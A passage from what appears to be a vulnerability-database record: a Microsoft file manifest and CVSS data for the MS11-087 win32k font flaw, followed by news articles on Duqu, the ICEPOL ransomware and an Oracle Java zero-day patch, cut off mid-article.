class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_3_for_kb2639417_bf~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr 
class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,017</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_3_for_kb2639417~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,281</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_4_for_kb2639417_bf~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,987</td></tr><tr 
class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_4_for_kb2639417~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,119</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_5_for_kb2639417_bf~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,794</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr 
class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_5_for_kb2639417~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,501</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_6_for_kb2639417_bf~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,823</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr 
class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_6_for_kb2639417~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,084</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_7_for_kb2639417_bf~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,409</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr 
class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_7_for_kb2639417~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,884</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_8_for_kb2639417_bf~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,185</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td 
class=\"sbody-td\">Package_8_for_kb2639417~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,914</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_rtm_bf~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,786</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_rtm~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span 
class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,878</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_sp1_bf~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,783</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_sp1~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span 
class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,842</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Update-bf.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,990</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Wow64_microsoft-windows-win32k_31bf3856ad364e35_6.1.7600.16920_none_1f78ff2de86c5af3.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,178</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date 
(UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">06:56</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Wow64_microsoft-windows-win32k_31bf3856ad364e35_6.1.7600.21097_none_1fbdc4c701bca5d0.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,178</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">06:56</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Wow64_microsoft-windows-win32k_31bf3856ad364e35_6.1.7601.17730_none_21548c47e59ae2d0.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,178</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr 
class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">06:51</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Wow64_microsoft-windows-win32k_31bf3856ad364e35_6.1.7601.21866_none_21c3bb0afecb6e77.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,178</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">06:51</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr></table></div></div></body></html>", "edition": 2, "cvss3": {}, "published": "2011-12-13T00:00:00", "type": "mskb", "title": "MS11-087: Vulnerability in Windows kernel-mode drivers could allow remote code execution: December 13, 2011", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, 
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3402"], "modified": "2012-05-08T16:01:10", "id": "KB2639417", "href": "https://support.microsoft.com/en-us/help/2639417/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2023-05-15T00:21:08", "description": "**Duqu** malware was created to spy on **Iran's nuclear program** \n\n\n[](<https://thehackernews.com/images/-eQNoB-MOkio/TrYnxTpMfgI/AAAAAAAADY4/7GQCPQFlIhc/s728-e365/photo+1.jpg>)\n\n** \n** \nA Report by Kaspersky Lab Expert, Ryan Naraine says that the DUQU malware was created to spy on Iran's nuclear program. IrCERT (Iran's Computer Emergency Response Team) Duqu is an upgraded version of \"Stars\". Back in April this year, The Iranian government says it is being targeted by a new piece of malware aimed at its federal computers. \n \nAlso its confirm that some of the targets of Duqu were hit on April 21, using the same method involving CVE-2011-3402, a kernel level exploit in win32k.sys via embedded True Type Font (TTF) file. \n \nIn both cases a malware similar to Stuxnet found in systems and stealing information. Do you think these relate to each other ? If we are to believe these reports, then it means that Duqu was created in order to spy on Iran's nuclear program. \n \nAnother interesting part of information is that more than 10 nations have supplied intelligence suggesting Iran is secretly developing components of a nuclear arms program - among them an implosion-type. New intelligence the U.N. atomic agency plans to release on alleged nuclear weapons work by Iran is fabricated, the Iranian foreign minister. Whereas , Iran dismisses reported UN claims of nuclear work. 
There are high possibility that **Stars** and **Duqu** were used to collect such information.\n", "cvss3": {}, "published": "2011-11-06T06:24:00", "type": "thn", "title": "Duqu malware was created to spy on Iran's nuclear program", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3402"], "modified": "2012-03-19T19:59:41", "id": "THN:3E923BF60240465681EDB5EF458156F0", "href": "https://thehackernews.com/2011/11/duqu-malware-was-created-to-spy-on.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-27T09:17:42", "description": "[](<https://3.bp.blogspot.com/-goylQ_crASs/UuoeOzUewsI/AAAAAAAAASk/xLNzzDSmUHQ/s1600/ICEPOL+Reveton+Ransomware+Trojan.jpg>)\n\nAfter Financial and Banking Malwares, Ransomware has become the first choice of money motivated cybercriminals.\n\n \n\n\nA new Ransomware Trojan known as **ICEPOL** has been one of those widespread malware which has been successfully installed approximately 267,786 times worldwide and 42,400 in the USA alone over a five month period, analyzed by the security firm [_BitDefender_](<http://www.presseportal.de/pm/52715/2651614/gemeinsame-aktion-mit-der-rumaenischen-polizei-bitdefender-hat-icepol-trojaner-untersucht>).\n\n \n\n\nThe** **ICEPOL Trojan** **categorized as Ransomware that locks your PC and demand for a ransom amount to unlock it. The Malware was using a previously known vulnerability in Java software i.e. 
[_CVE-2013-0422_](<http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html>) to infect the systems.\n\n \n\n\nThe malware threatened the user with accusations of illegal piracy or '_porn-related activity_' and requires money for exemption from punishment that pretends to be from the 'police'.\n\n \n\n\n\u201c_The ICEPOL Trojan extorted victims who downloaded it by sending them a message in any one of 25 languages purporting to be from police accusing them of downloading copyrighted material or illegal porn_,\u201d said Catalin Cosoi, Chief Security Strategist from Bitdefender.\n\n \n\n\nThe [malware](<https://thehackernews.com/search/label/Malware>) includes one more money making scheme, i.e. Designed to redirect the victims to the website via _pay-per-click_ scam under the traffic exchange mechanism. The police estimated that more than $32,000 was stolen from the U.S. victims over the five-month period.\n\n \n\n\nThe Romanian police in cooperation with the Internet security firm Bitdefender found dozens of C&C servers and successfully seized one of the major C&C servers, which was the part of large distribution of ICEPOL Trojans, located in the Romanian capital Bucharest.\n\n \n\n\n\u201c_The results of the investigation of ICEPOL Trojan based on cooperation with various law enforcement agencies and third party vendors. Despite the complex investigations, we have so far achieved very good results and we will continue to fight cybercrime_\", says the head of the agency against cyber crime, the Romanian National Police.\n\n \n\n\nThis is not the first time when a ransomware tricked the victims successfully, also last year [cryptolocker](<https://thehackernews.com/search/label/CryptoLocker>) of the same category hits millions of computer users. So, users are advised to keep their systems software and anti-virus solutions up-to-date and most importantly patch your Java distribution immediately to _Update 51_.\n\n \n\n\nStay Safe! 
Stay Tuned!\n", "cvss3": {}, "published": "2014-01-29T22:48:00", "type": "thn", "title": "ICEPOL Ransomware Servers seized by Romanian Police that infected 260,000 Computers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-0422"], "modified": "2014-01-31T06:55:09", "id": "THN:4EAA4FEF21F8E68A90003CC58D6639E2", "href": "https://thehackernews.com/2014/01/icepol-ransomware-servers-seized-by.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-08T18:01:26", "description": "[](<http://2.bp.blogspot.com/-hmHfgVixQNI/UPbcy1J22jI/AAAAAAAAR4M/oWTQ6wJAx4E/s1600/Oracle+Patches+Java+Zero+Day+Vulnerability.jpg>)\n\nOracle delivered an unusual emergency patch to Java's critical Zero Day vulnerability on Sunday to fix a malicious bug that allowed hackers access to users web browsers. Exploits for the [previously undisclosed flaw were](<http://thehackernews.com/2013/01/exploit-packs-updated-with-new-java.html>) being hosted in a number of [exploit kits](<http://thehackernews.com/2012/09/blackhole-exploit-kit-20-released-with.html>) and attacks have already been seen in the wild dropping ransomware and assorted other malware.\n\n \n\n\nSecurity Alert [CVE-2013-0422](<http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html>) include two [vulnerabilities](<http://thehackernews.com/2012/12/hunting-vulnerabilities-in-scada.html>) that are remotely executable. Oracle confirmed that the flaws were only present in Java 7 versions and did not impact Java on servers, Java desktop applications, or embedded Java.\n\n \n \n\n\nJava is used in 3 billion machines, about 2 billion of which are desktop or laptop computers. 
Similarly, Back in August last year, Oracle issued an urgent fix to seal a dangerous security flaw within its Java software that\u2019s left thousands of computers wide open to malicious attacks from hackers.\n\n \n\n\n**_Lamar Bailey_**, director of security research and development for [nCircle](<https://www.ncircle.com/>) said, \u201c_We\u2019re just two weeks into 2013 and already we\u2019ve seen a surge of critical vulnerabilities and emergency patches. Oracle just added 86 new fixes to overloaded IT teams already struggling to keep up with emergency patches for Java, Internet Explorer and Ruby on Rails._ \n_ \n_ _No matter how far behind IT teams are, they can\u2019t afford to ignore this massive Oracle patch. Oracle Mobile Server has two CVEs that have a CVSS score of ten, that\u2019s as bad as it gets. There are also two MySQL vulnerabilities that can be exploited remotely. All of these should be patched as soon as possible_.\u201d \n \nJanuary Patch include 86 security updates across all major product lines including [Oracle Database](<http://thehackernews.com/2012/05/oracle-database-new-zero-day-exploit.html>) and MySQL Server. 
Patches for a number of Oracle applications were released Tuesday, including nine for Oracle E-Business Suite (7 of which are remotely exploitable), 12 in Oracle PeopleSoft (7 remotely exploitable), 10 in Oracle Siebel CRM (5 remotely exploitable), and one each in Oracle Supply Chain Products Suite and Oracle JD Edwards Products.\n", "cvss3": {}, "published": "2013-01-16T06:01:00", "type": "thn", "title": "Oracle Patches Java Zero Day Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-0422"], "modified": "2013-01-16T17:01:53", "id": "THN:B322DFBE39D6B1984ECCA4237D6EB6EB", "href": "http://thehackernews.com/2013/01/oracle-patches-java-zero-day.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-05-11T00:20:13", "description": "[](<https://thehackernews.com/images/-hmHfgVixQNI/UPbcy1J22jI/AAAAAAAAR4M/oWTQ6wJAx4E/s728-e365/Oracle+Patches+Java+Zero+Day+Vulnerability.jpg>)\n\nOracle delivered an unusual emergency patch to Java's critical Zero Day vulnerability on Sunday 